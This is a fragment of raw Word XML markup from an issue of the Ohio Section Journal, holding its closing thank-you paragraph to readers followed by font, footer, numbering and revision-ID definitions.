          <v:rect id="_x0000_i1098" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D34AA5B" w14:textId="0B8584C4" w:rsidR="00FD0EAD" w:rsidRPr="00FD0EAD" w:rsidRDefault="00FD0EAD" w:rsidP="00FD0EAD">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD0EAD">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">The Ohio Section Journal (OSJ) is produced as a comprehensive look at all the programs within the Ohio Section. I sincerely hope that you have enjoyed this edition of the </w:t>
      </w:r>
      <w:bookmarkStart w:id="41" w:name="_Hlk496976409"/>
      <w:r w:rsidR="009F2EEE" w:rsidRPr="00FD0EAD">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>OSJ and</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD0EAD">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> will encourage your friends to join with you in receiving the latest news and </w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidRPr="00FD0EAD">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>information about the Ohio Section, and from around the world!</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:sectPr w:rsidR="00FD0EAD" w:rsidRPr="00FD0EAD" w:rsidSect="005E7645">
      <w:footerReference w:type="default" r:id="rId209"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="720" w:right="720" w:bottom="720" w:left="720" w:header="0" w:footer="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E5D6BFE" w14:textId="77777777" w:rsidR="0084211F" w:rsidRDefault="0084211F" w:rsidP="00F40211">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="14E292F7" w14:textId="77777777" w:rsidR="0084211F" w:rsidRDefault="0084211F" w:rsidP="00F402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altName w:val="Yu Gothic"/>
    <w:charset w:val="80"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>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erpetua">
    <w:panose1 w:val="02020502060401020303"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>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Lucida Sans Unicode">
    <w:panose1 w:val="020B0602030504020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="80000AFF" w:usb1="0000396B" w:usb2="00000000" w:usb3="00000000" w:csb0="000000BF" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Tahoma">
    <w:altName w:val="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Helvetica">
    <w:panose1 w:val="020B0604020202020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>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font870">
    <w:altName w:val="Yu Gothic"/>
    <w:charset w:val="80"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Georgia">
    <w:panose1 w:val="02040502050405020303"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="00000287" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="0000009F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Comic Sans MS">
    <w:panose1 w:val="030F0702030302020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="script"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="00000287" w:usb1="00000013" w:usb2="00000000" w:usb3="00000000" w:csb0="0000009F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Roboto">
    <w:altName w:val="Roboto"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E00002FF" w:usb1="5000205B" w:usb2="00000020" w:usb3="00000000" w:csb0="000001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91081906"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:color w:val="7F7F7F" w:themeColor="background1" w:themeShade="7F"/>
        <w:spacing w:val="60"/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="13164688" w14:textId="0FEAFF53" w:rsidR="006844D9" w:rsidRPr="00484C07" w:rsidRDefault="006844D9" w:rsidP="00484C07">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Pr="000D0B69">
          <w:rPr>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>15</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t xml:space="preserve"> | </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="7F7F7F" w:themeColor="background1" w:themeShade="7F"/>
            <w:spacing w:val="60"/>
          </w:rPr>
          <w:t>Page</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t xml:space="preserve">                                                                                                                                            </w:t>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="589C89C6" w14:textId="77777777" w:rsidR="006844D9" w:rsidRDefault="006844D9"/>
  <w:p w14:paraId="085E5DE1" w14:textId="77777777" w:rsidR="006844D9" w:rsidRDefault="006844D9"/>
  <w:p w14:paraId="27443843" w14:textId="77777777" w:rsidR="006844D9" w:rsidRDefault="006844D9"/>
  <w:p w14:paraId="68B3B6D4" w14:textId="77777777" w:rsidR="006844D9" w:rsidRDefault="006844D9"/>
  <w:p w14:paraId="62C3EBC8" w14:textId="77777777" w:rsidR="006844D9" w:rsidRDefault="006844D9"/>
  <w:p w14:paraId="36318D15" w14:textId="77777777" w:rsidR="006844D9" w:rsidRDefault="006844D9"/>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E406EDC" w14:textId="77777777" w:rsidR="0084211F" w:rsidRDefault="0084211F" w:rsidP="00F40211">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7024E185" w14:textId="77777777" w:rsidR="0084211F" w:rsidRDefault="0084211F" w:rsidP="00F4021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name w:val="WW8Num6"/>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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00000002"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00000002"/>
    <w:name w:val="WW8Num3"/>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2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00000003"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00000003"/>
    <w:name w:val="WW8Num7"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="707"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="2"/>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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00000004"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00000004"/>
    <w:name w:val="WW8Num4"/>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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00000005"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00000005"/>
    <w:name w:val="WW8Num5"/>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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00000009"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00000009"/>
    <w:name w:val="WW8Num9"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="8"/>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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="08665C67"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F9303F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0AF3C6F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="40CC1C32"/>
    <w:styleLink w:val="WW8Num22"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="none"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="432" w:hanging="432"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="none"/>
      <w:lvlText w:val="%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="576" w:hanging="576"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="none"/>
      <w:lvlText w:val="%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="none"/>
      <w:lvlText w:val="%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="864" w:hanging="864"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="none"/>
      <w:lvlText w:val="%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1008" w:hanging="1008"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="none"/>
      <w:lvlText w:val="%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1152" w:hanging="1152"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="none"/>
      <w:lvlText w:val="%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1296" w:hanging="1296"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="none"/>
      <w:lvlText w:val="%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="1440"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="none"/>
      <w:lvlText w:val="%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1584" w:hanging="1584"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="15441623"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DCC4C668"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:color w:val="00000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1D0452AB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="501CC3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233555D1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F00E03D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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="25393263"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="45B482F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A343F8E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BC64D4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301A0037"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D32CE5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05562DB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="77D83D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5AF2710"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C1D6D358"/>
    <w:lvl w:ilvl="0" w:tplc="B8D66734">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Perpetua" w:eastAsia="Times New Roman" w:hAnsi="Perpetua" w:cstheme="minorHAnsi"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F4F0D49"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="983258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56AF325F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="851CF44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8BC7C13"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5B8458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5ED43F68"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A244901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646F4BE4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4E08FB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72E87E12"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B1C8EB9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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="73F13D3F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FEF2307C"/>
    <w:lvl w:ilvl="0" w:tplc="5ACA7D8C">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7"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="20"/>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drawingGridHorizontalSpacing w:val="12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40211"/>
    <w:rsid w:val="000002B9"/>
    <w:rsid w:val="00000356"/>
    <w:rsid w:val="000005FB"/>
    <w:rsid w:val="0000071E"/>
    <w:rsid w:val="000008F9"/>
    <w:rsid w:val="00000E03"/>
    <w:rsid w:val="000010E8"/>
    <w:rsid w:val="000011A2"/>
    <w:rsid w:val="000011FC"/>
    <w:rsid w:val="00001403"/>
    <w:rsid w:val="000014A1"/>
    <w:rsid w:val="00001E29"/>
    <w:rsid w:val="00001FCC"/>
    <w:rsid w:val="00002509"/>
    <w:rsid w:val="00002706"/>
    <w:rsid w:val="0000274A"/>
    <w:rsid w:val="00002E16"/>
    <w:rsid w:val="000030E3"/>
    <w:rsid w:val="0000332D"/>
    <w:rsid w:val="00003510"/>
    <w:rsid w:val="000040B5"/>
    <w:rsid w:val="0000412C"/>
    <w:rsid w:val="000043AD"/>
    <w:rsid w:val="000045F8"/>
    <w:rsid w:val="000049F3"/>
    <w:rsid w:val="00004B36"/>
    <w:rsid w:val="00004C80"/>
    <w:rsid w:val="00004E57"/>
    <w:rsid w:val="000050D6"/>
    <w:rsid w:val="0000525E"/>
    <w:rsid w:val="00005449"/>
    <w:rsid w:val="00005CD4"/>
    <w:rsid w:val="0000649E"/>
    <w:rsid w:val="00006C73"/>
    <w:rsid w:val="000075A2"/>
    <w:rsid w:val="0000764C"/>
    <w:rsid w:val="000077DB"/>
    <w:rsid w:val="00007DE8"/>
    <w:rsid w:val="000103C0"/>
    <w:rsid w:val="0001076B"/>
    <w:rsid w:val="000109F5"/>
    <w:rsid w:val="00010BCD"/>
    <w:rsid w:val="0001152D"/>
    <w:rsid w:val="000116E8"/>
    <w:rsid w:val="000117FC"/>
    <w:rsid w:val="00011A8E"/>
    <w:rsid w:val="00011C90"/>
    <w:rsid w:val="00011CBB"/>
    <w:rsid w:val="00012506"/>
    <w:rsid w:val="000126E1"/>
    <w:rsid w:val="00012FF5"/>
    <w:rsid w:val="000130EA"/>
    <w:rsid w:val="000133FA"/>
    <w:rsid w:val="00013BB5"/>
    <w:rsid w:val="00014058"/>
    <w:rsid w:val="000140FA"/>
    <w:rsid w:val="000147FF"/>
    <w:rsid w:val="00014C4E"/>
    <w:rsid w:val="0001516E"/>
    <w:rsid w:val="000156E4"/>
    <w:rsid w:val="00015AC8"/>
    <w:rsid w:val="00015BD6"/>
    <w:rsid w:val="00015C29"/>
    <w:rsid w:val="000163BA"/>
    <w:rsid w:val="000163D0"/>
    <w:rsid w:val="0001648E"/>
    <w:rsid w:val="00016544"/>
    <w:rsid w:val="0001665F"/>
    <w:rsid w:val="00016CBF"/>
    <w:rsid w:val="00016CCD"/>
    <w:rsid w:val="00020394"/>
    <w:rsid w:val="000203FB"/>
    <w:rsid w:val="00020ABC"/>
    <w:rsid w:val="00021112"/>
    <w:rsid w:val="0002135D"/>
    <w:rsid w:val="000213CD"/>
    <w:rsid w:val="00021478"/>
    <w:rsid w:val="000218A5"/>
    <w:rsid w:val="00021E06"/>
    <w:rsid w:val="000224AE"/>
    <w:rsid w:val="000229B9"/>
    <w:rsid w:val="00023140"/>
    <w:rsid w:val="000231F8"/>
    <w:rsid w:val="0002337D"/>
    <w:rsid w:val="00023459"/>
    <w:rsid w:val="00023464"/>
    <w:rsid w:val="00023758"/>
    <w:rsid w:val="0002375A"/>
    <w:rsid w:val="00023C41"/>
    <w:rsid w:val="00023E9B"/>
    <w:rsid w:val="00024186"/>
    <w:rsid w:val="00024331"/>
    <w:rsid w:val="0002435F"/>
    <w:rsid w:val="00024588"/>
    <w:rsid w:val="00024C48"/>
    <w:rsid w:val="00025EC7"/>
    <w:rsid w:val="00025ECE"/>
    <w:rsid w:val="000265D3"/>
    <w:rsid w:val="0002662D"/>
    <w:rsid w:val="0002664A"/>
    <w:rsid w:val="000266AE"/>
    <w:rsid w:val="000268A1"/>
    <w:rsid w:val="00026D65"/>
    <w:rsid w:val="00026E1C"/>
    <w:rsid w:val="00026E62"/>
    <w:rsid w:val="000271EB"/>
    <w:rsid w:val="00027388"/>
    <w:rsid w:val="00027647"/>
    <w:rsid w:val="00027837"/>
    <w:rsid w:val="000279F8"/>
    <w:rsid w:val="00027A1E"/>
    <w:rsid w:val="0003001F"/>
    <w:rsid w:val="00030278"/>
    <w:rsid w:val="0003035D"/>
    <w:rsid w:val="0003059A"/>
    <w:rsid w:val="00030730"/>
    <w:rsid w:val="000307FC"/>
    <w:rsid w:val="000308D9"/>
    <w:rsid w:val="00030AF3"/>
    <w:rsid w:val="00030C3A"/>
    <w:rsid w:val="00030C71"/>
    <w:rsid w:val="00030D11"/>
    <w:rsid w:val="00030FFD"/>
    <w:rsid w:val="00031010"/>
    <w:rsid w:val="000310D6"/>
    <w:rsid w:val="00031974"/>
    <w:rsid w:val="00031E3C"/>
    <w:rsid w:val="0003218C"/>
    <w:rsid w:val="0003227F"/>
    <w:rsid w:val="0003258A"/>
    <w:rsid w:val="00032AA2"/>
    <w:rsid w:val="00032CDE"/>
    <w:rsid w:val="0003347C"/>
    <w:rsid w:val="000336AA"/>
    <w:rsid w:val="00033DB0"/>
    <w:rsid w:val="0003409B"/>
    <w:rsid w:val="0003424A"/>
    <w:rsid w:val="00035024"/>
    <w:rsid w:val="0003513B"/>
    <w:rsid w:val="000355A9"/>
    <w:rsid w:val="00035D24"/>
    <w:rsid w:val="00035E5F"/>
    <w:rsid w:val="000366CF"/>
    <w:rsid w:val="00036F9A"/>
    <w:rsid w:val="00037887"/>
    <w:rsid w:val="00037B0A"/>
    <w:rsid w:val="00037C5D"/>
    <w:rsid w:val="00037C9E"/>
    <w:rsid w:val="00037E0A"/>
    <w:rsid w:val="00037E17"/>
    <w:rsid w:val="0004010A"/>
    <w:rsid w:val="0004024F"/>
    <w:rsid w:val="000404A3"/>
    <w:rsid w:val="00040520"/>
    <w:rsid w:val="000406C3"/>
    <w:rsid w:val="000406EC"/>
    <w:rsid w:val="000407C0"/>
    <w:rsid w:val="00040A5B"/>
    <w:rsid w:val="00040A68"/>
    <w:rsid w:val="00040AF9"/>
    <w:rsid w:val="00040E14"/>
    <w:rsid w:val="00040E7B"/>
    <w:rsid w:val="00040EC7"/>
    <w:rsid w:val="00040ED3"/>
    <w:rsid w:val="00040F28"/>
    <w:rsid w:val="000410F1"/>
    <w:rsid w:val="00041180"/>
    <w:rsid w:val="0004124E"/>
    <w:rsid w:val="000412B5"/>
    <w:rsid w:val="0004157F"/>
    <w:rsid w:val="0004188F"/>
    <w:rsid w:val="00041B39"/>
    <w:rsid w:val="00041CC0"/>
    <w:rsid w:val="00041F47"/>
    <w:rsid w:val="000421F6"/>
    <w:rsid w:val="00042216"/>
    <w:rsid w:val="0004273B"/>
    <w:rsid w:val="00042D1A"/>
    <w:rsid w:val="00042DCC"/>
    <w:rsid w:val="00043343"/>
    <w:rsid w:val="00043773"/>
    <w:rsid w:val="00044651"/>
    <w:rsid w:val="000449D5"/>
    <w:rsid w:val="00044C94"/>
    <w:rsid w:val="00045051"/>
    <w:rsid w:val="000452C1"/>
    <w:rsid w:val="0004597A"/>
    <w:rsid w:val="00045CA6"/>
    <w:rsid w:val="00045D66"/>
    <w:rsid w:val="00045D8B"/>
    <w:rsid w:val="000461E9"/>
    <w:rsid w:val="000467E8"/>
    <w:rsid w:val="00046874"/>
    <w:rsid w:val="00046AB7"/>
    <w:rsid w:val="000471FF"/>
    <w:rsid w:val="00047463"/>
    <w:rsid w:val="000475AF"/>
    <w:rsid w:val="00047B20"/>
    <w:rsid w:val="00047DB1"/>
    <w:rsid w:val="0005022D"/>
    <w:rsid w:val="00050278"/>
    <w:rsid w:val="00050543"/>
    <w:rsid w:val="00050611"/>
    <w:rsid w:val="00051405"/>
    <w:rsid w:val="000514B4"/>
    <w:rsid w:val="00052773"/>
    <w:rsid w:val="000532D0"/>
    <w:rsid w:val="00053875"/>
    <w:rsid w:val="0005393D"/>
    <w:rsid w:val="00054100"/>
    <w:rsid w:val="000544AC"/>
    <w:rsid w:val="00054675"/>
    <w:rsid w:val="000547C4"/>
    <w:rsid w:val="0005498E"/>
    <w:rsid w:val="00054CC7"/>
    <w:rsid w:val="00054E17"/>
    <w:rsid w:val="00055011"/>
    <w:rsid w:val="00055DFD"/>
    <w:rsid w:val="00055E49"/>
    <w:rsid w:val="00055F89"/>
    <w:rsid w:val="00055FF1"/>
    <w:rsid w:val="000563E9"/>
    <w:rsid w:val="000565F1"/>
    <w:rsid w:val="00056AAD"/>
    <w:rsid w:val="00056B19"/>
    <w:rsid w:val="0005712A"/>
    <w:rsid w:val="00057153"/>
    <w:rsid w:val="000578D5"/>
    <w:rsid w:val="00057F9B"/>
    <w:rsid w:val="00057FAA"/>
    <w:rsid w:val="00057FB6"/>
    <w:rsid w:val="0006006F"/>
    <w:rsid w:val="00060BDA"/>
    <w:rsid w:val="00060CD3"/>
    <w:rsid w:val="000611EF"/>
    <w:rsid w:val="00061933"/>
    <w:rsid w:val="00061983"/>
    <w:rsid w:val="000619B4"/>
    <w:rsid w:val="00061A12"/>
    <w:rsid w:val="00061B87"/>
    <w:rsid w:val="00061E46"/>
    <w:rsid w:val="00062034"/>
    <w:rsid w:val="00062397"/>
    <w:rsid w:val="00062933"/>
    <w:rsid w:val="00062956"/>
    <w:rsid w:val="00062C13"/>
    <w:rsid w:val="00062EA9"/>
    <w:rsid w:val="00063512"/>
    <w:rsid w:val="000636C4"/>
    <w:rsid w:val="000637DE"/>
    <w:rsid w:val="00063B04"/>
    <w:rsid w:val="00063CBC"/>
    <w:rsid w:val="00063E91"/>
    <w:rsid w:val="00064367"/>
    <w:rsid w:val="0006439F"/>
    <w:rsid w:val="00064453"/>
    <w:rsid w:val="000645B2"/>
    <w:rsid w:val="00064612"/>
    <w:rsid w:val="00064641"/>
    <w:rsid w:val="000647A6"/>
    <w:rsid w:val="000648D8"/>
    <w:rsid w:val="0006498C"/>
    <w:rsid w:val="00064CFF"/>
    <w:rsid w:val="00065016"/>
    <w:rsid w:val="000658C8"/>
    <w:rsid w:val="00065A6F"/>
    <w:rsid w:val="00065E8F"/>
    <w:rsid w:val="00065FC7"/>
    <w:rsid w:val="00066312"/>
    <w:rsid w:val="00066974"/>
    <w:rsid w:val="00066B0E"/>
    <w:rsid w:val="000670E9"/>
    <w:rsid w:val="00067516"/>
    <w:rsid w:val="00067AB8"/>
    <w:rsid w:val="00067BF9"/>
    <w:rsid w:val="000700A4"/>
    <w:rsid w:val="0007060F"/>
    <w:rsid w:val="00070B84"/>
    <w:rsid w:val="00070D61"/>
    <w:rsid w:val="00070D72"/>
    <w:rsid w:val="000710D0"/>
    <w:rsid w:val="000714F7"/>
    <w:rsid w:val="00071780"/>
    <w:rsid w:val="00071C08"/>
    <w:rsid w:val="00071D65"/>
    <w:rsid w:val="00071E79"/>
    <w:rsid w:val="00071F15"/>
    <w:rsid w:val="000722E1"/>
    <w:rsid w:val="00072526"/>
    <w:rsid w:val="000725EE"/>
    <w:rsid w:val="00072D68"/>
    <w:rsid w:val="00072E3E"/>
    <w:rsid w:val="00072E79"/>
    <w:rsid w:val="000734C0"/>
    <w:rsid w:val="000734D6"/>
    <w:rsid w:val="000738B0"/>
    <w:rsid w:val="00073907"/>
    <w:rsid w:val="00073CBE"/>
    <w:rsid w:val="00074432"/>
    <w:rsid w:val="00074484"/>
    <w:rsid w:val="00074B4C"/>
    <w:rsid w:val="00074EC6"/>
    <w:rsid w:val="00075005"/>
    <w:rsid w:val="0007586C"/>
    <w:rsid w:val="00075A39"/>
    <w:rsid w:val="0007640A"/>
    <w:rsid w:val="00076619"/>
    <w:rsid w:val="00076700"/>
    <w:rsid w:val="000769B2"/>
    <w:rsid w:val="00076BEA"/>
    <w:rsid w:val="00076D6F"/>
    <w:rsid w:val="000771C4"/>
    <w:rsid w:val="0007727E"/>
    <w:rsid w:val="00077595"/>
    <w:rsid w:val="00077801"/>
    <w:rsid w:val="00077AAA"/>
    <w:rsid w:val="00077BC6"/>
    <w:rsid w:val="00080378"/>
    <w:rsid w:val="00080617"/>
    <w:rsid w:val="00080695"/>
    <w:rsid w:val="00080991"/>
    <w:rsid w:val="000809F6"/>
    <w:rsid w:val="00080D5A"/>
    <w:rsid w:val="000810BA"/>
    <w:rsid w:val="000815BB"/>
    <w:rsid w:val="00081D15"/>
    <w:rsid w:val="000821C5"/>
    <w:rsid w:val="00082821"/>
    <w:rsid w:val="0008293A"/>
    <w:rsid w:val="00082AE9"/>
    <w:rsid w:val="00082C3F"/>
    <w:rsid w:val="00082D27"/>
    <w:rsid w:val="00082F5B"/>
    <w:rsid w:val="0008327F"/>
    <w:rsid w:val="00083386"/>
    <w:rsid w:val="000837C0"/>
    <w:rsid w:val="00083855"/>
    <w:rsid w:val="000838D1"/>
    <w:rsid w:val="000839D3"/>
    <w:rsid w:val="00083C2C"/>
    <w:rsid w:val="000841C6"/>
    <w:rsid w:val="000844C3"/>
    <w:rsid w:val="00084B36"/>
    <w:rsid w:val="000850A3"/>
    <w:rsid w:val="000851EB"/>
    <w:rsid w:val="000857F0"/>
    <w:rsid w:val="0008593B"/>
    <w:rsid w:val="000859B6"/>
    <w:rsid w:val="00085A18"/>
    <w:rsid w:val="00085A46"/>
    <w:rsid w:val="00085ED2"/>
    <w:rsid w:val="0008608D"/>
    <w:rsid w:val="000878B7"/>
    <w:rsid w:val="00087990"/>
    <w:rsid w:val="00087D96"/>
    <w:rsid w:val="000904C7"/>
    <w:rsid w:val="00090528"/>
    <w:rsid w:val="000906F0"/>
    <w:rsid w:val="00090C23"/>
    <w:rsid w:val="00090CAA"/>
    <w:rsid w:val="00090CDB"/>
    <w:rsid w:val="0009122F"/>
    <w:rsid w:val="00091279"/>
    <w:rsid w:val="00091A3C"/>
    <w:rsid w:val="00091DAE"/>
    <w:rsid w:val="0009217B"/>
    <w:rsid w:val="00092E58"/>
    <w:rsid w:val="000934C3"/>
    <w:rsid w:val="00093696"/>
    <w:rsid w:val="0009375C"/>
    <w:rsid w:val="000939C3"/>
    <w:rsid w:val="00093EC9"/>
    <w:rsid w:val="000942AB"/>
    <w:rsid w:val="000946F1"/>
    <w:rsid w:val="000948FF"/>
    <w:rsid w:val="00094BE6"/>
    <w:rsid w:val="00094C18"/>
    <w:rsid w:val="00094CC1"/>
    <w:rsid w:val="00095414"/>
    <w:rsid w:val="000958A0"/>
    <w:rsid w:val="000959D7"/>
    <w:rsid w:val="00095B3F"/>
    <w:rsid w:val="00095CA7"/>
    <w:rsid w:val="000961FF"/>
    <w:rsid w:val="00096377"/>
    <w:rsid w:val="00096592"/>
    <w:rsid w:val="00096878"/>
    <w:rsid w:val="00096A87"/>
    <w:rsid w:val="00096C3A"/>
    <w:rsid w:val="00096D62"/>
    <w:rsid w:val="00096E45"/>
    <w:rsid w:val="000970C5"/>
    <w:rsid w:val="000971C2"/>
    <w:rsid w:val="000975FD"/>
    <w:rsid w:val="00097755"/>
    <w:rsid w:val="00097970"/>
    <w:rsid w:val="00097C55"/>
    <w:rsid w:val="00097D80"/>
    <w:rsid w:val="000A068E"/>
    <w:rsid w:val="000A0ABF"/>
    <w:rsid w:val="000A0C71"/>
    <w:rsid w:val="000A0CB0"/>
